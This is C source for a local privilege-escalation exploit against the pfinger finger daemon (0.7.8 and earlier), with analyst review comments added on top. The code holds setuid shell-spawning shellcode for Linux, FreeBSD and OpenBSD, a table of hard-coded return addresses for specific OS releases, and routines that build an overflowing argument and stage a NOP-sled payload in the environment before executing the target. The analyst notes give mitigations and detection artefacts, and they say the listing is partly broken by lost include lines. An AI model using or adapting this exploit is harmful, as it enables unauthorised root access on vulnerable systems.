/*
 * !!PRIVATE!! DON'T DISTRIBUTE !!
 * L33TSecurity - confidential source
 *
 * Pfinger-0.7.8 <= Local Exploit
 * By Dvdman@L33TSECURITY.COM
 * GREETS: UPB,JDUCK
 * Thanks for all the C help UPB :)
 *
 * L33TSecurity - confidential source
 * !!PRIVATE!! DON'T DISTRIBUTE !!
 */

/*
 * Analyst notes (added in review; the code below is unchanged):
 *
 * What this sample is: a local proof-of-concept that runs "./finger" (the
 * author's header names pfinger 0.7.8 and earlier) with one oversized
 * command-line argument, after placing a payload in an environment variable
 * named SHELLCODE. The argument ends with a hard-coded address taken from
 * targets[]; the author labels that field the return address, which points
 * to a stack buffer overflow in the program's argument handling.
 * NOTE(review): the vulnerable function itself is not shown on this page.
 *
 * Why it matters to defenders: any privilege gain depends on how the target
 * binary is installed. The header's "setuid shellcode" / "local root" wording
 * suggests the author expected a set-id binary -- confirm against the
 * package in question. The durable fix is bounds checking in the program
 * (a release later than the one named above; verify with the vendor
 * advisory). Dropping unneeded set-id bits removes the privilege boundary.
 *
 * Preconditions visible in the code: one absolute stack address per OS
 * release, and a payload executed from the process environment. Stack
 * address randomisation, non-executable stack/environment memory and stack
 * canaries are the generic mitigations for this class of bug.
 *
 * Observable artefacts: an exec of finger with a single argument of
 * roughly 100+ bytes that starts with a run of 'A' characters, and an
 * environment entry "SHELLCODE=" followed by 0x90 bytes.
 *
 * The listing is not buildable as shown: the header names on the three
 * #include lines were lost when the page was extracted. They are left as
 * found.
 */
#include /* header name missing in the page text */
#include /* header name missing in the page text */
#include /* header name missing in the page text */

/* Defined here; not referenced anywhere in the visible code. */
#define MAX_ARCH 8

//Linux Setuid Shellcode
/* i386 payload bytes, kept verbatim from the page; the "/bin/sh" string is
 * visible at the end. */
char linuxshellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";

//FreeBSD Setuid Shellcode
/* Payload bytes for the FreeBSD targets, kept verbatim from the page. */
char freebsdshellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";

//OpenBsd shellcode
/* Payload bytes for the OpenBSD target; the per-line annotations are the
 * author's own. */
char openbsdshellcode[]=
"\x99" /* cdq */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,%ebx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */

/*
 * One row per supported platform:
 *   type      - label printed by list_targets()
 *   shellcode - which payload array to stage in the environment
 *   ret_addr  - absolute address appended to the argument (author: "return
 *               address"); presumably where the SHELLCODE environment string
 *               is expected to sit in the new process -- not stated on page
 *   pad       - number of 'A' filler bytes written before the marker bytes
 */
struct TARGET {
    char *type;
    char *shellcode;
    unsigned long ret_addr;
    int pad;
};

/* Target table, terminated by a row whose type is NULL. The addresses are
 * fixed constants, so each row only fits a system with that exact,
 * non-randomised stack layout. */
struct TARGET targets [] = {
    {"Redhat 7.2 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
    {"Redhat 7.3 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
    {"Redhat 8.0 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
    {"Debian 3.0 -x86 shellcode", linuxshellcode, 0xbfffff96,88},
    {"Slackware 8.0 -x86 shellcode",linuxshellcode, 0xbfffff96,88},
    {"Freebsd 4.6-RELEASE -x86 shellcode",freebsdshellcode,0xbfbffe43,88},
    {"Freebsd 4.7-RC -x6 shellcode",freebsdshellcode,0xbfbffe43,88},
    {"OpenBsd 3.1 -x86 shellcode",openbsdshellcode,0xdfbfdb8e,88},
    {NULL, NULL, 0}
};

void ussage (char *argv);

/*
 * Entry point. argv[1] is parsed with atoi() and used as an index into
 * targets[]. The function then assembles the oversized argument in buffer[],
 * stages the selected payload in the environment as SHELLCODE, and replaces
 * the current process with ./finger. Nothing is returned on the success
 * path because execl() does not come back; there is no handling for an
 * execl() failure.
 */
int main(int argc, char **argv) {
    char buffer[2000];
    int x,i,blah;     /* declared but not used in the visible body */
    int target;
    int arch;         /* declared but not used in the visible body */
    char *ptr;        /* declared but not used in the visible body */
    long *longptr;    /* declared but not used in the visible body */
    char shell[512];

    /* ussage() prints the target list and calls exit(0). */
    if ((argc < 2)) ussage(argv[0]);
    /* NOTE(review): the parsed value indexes targets[] with no range check. */
    target = atoi(argv[1]);

    // Building the Buffer
    /* The buffer is zeroed first, so each strlen(buffer) below gives the
     * current end of what has been written so far. */
    bzero(&buffer, sizeof(buffer));
    memset(buffer,'A',targets[target].pad); //size of info
    /* Four 4-byte marker groups follow the filler. */
    memset(buffer+strlen(buffer),'B',4);
    memset(buffer+strlen(buffer),'C',4);
    memset(buffer+strlen(buffer),'D',4);
    memset(buffer+strlen(buffer),'E',4);
    /* Stores sizeof(unsigned long) bytes at the current end of the string;
     * the table values are 32-bit, so the code appears to assume a 32-bit
     * unsigned long. */
    *(unsigned long *)(buffer+strlen(buffer))=targets[target].ret_addr; //return address
    /* Copies the 8 literal bytes plus the literal's terminating NUL. */
    memcpy(buffer+strlen(buffer),"\xC4\xC3\xC2\xC1\x45\x53\x80\x80",9); //sets ARGC>0x7FFFFFFF

    //setting shellcode to ENVSPACE
    /* First 100 bytes of shell[] are filled with 0x90, the payload is copied
     * so that it ends at offset 100, then the first 10 bytes are overwritten
     * with the variable name. The result is handed to putenv(). */
    memset(shell,0x90,100);
    memcpy(&shell[100-strlen(targets[target].shellcode)],targets[target].shellcode,strlen(targets[target].shellcode));
    memcpy(shell,"SHELLCODE=",10);
    putenv(shell);

    /* Runs the finger binary from the current directory with the assembled
     * buffer as its only argument. */
    execl("./finger", "finger", buffer, NULL);
}

/* Prints every targets[] row (index and label) to stderr, stopping at the
 * NULL-typed sentinel row. */
void list_targets () {
    int i;
    for (i=0; targets[i].type != NULL; i++) {
        fprintf (stderr, "%d) - %s\n", i, targets[i].type);
    }
}

/*
 * Prints the banner and the target list, then exits with status 0.
 * argv is the program name (main passes argv[0]).
 * NOTE(review): the third printf has a %s conversion with no matching
 * argument; part of the original format text may have been lost in page
 * extraction.
 */
void ussage (char *argv) {
    printf ("%s - pfinger local root, user, whatever exploit\n", argv);
    printf ("written by dvdman\n\n");
    printf ("Ussage %s \ntargets avalible:\n\n");
    list_targets ();
    exit(0);
}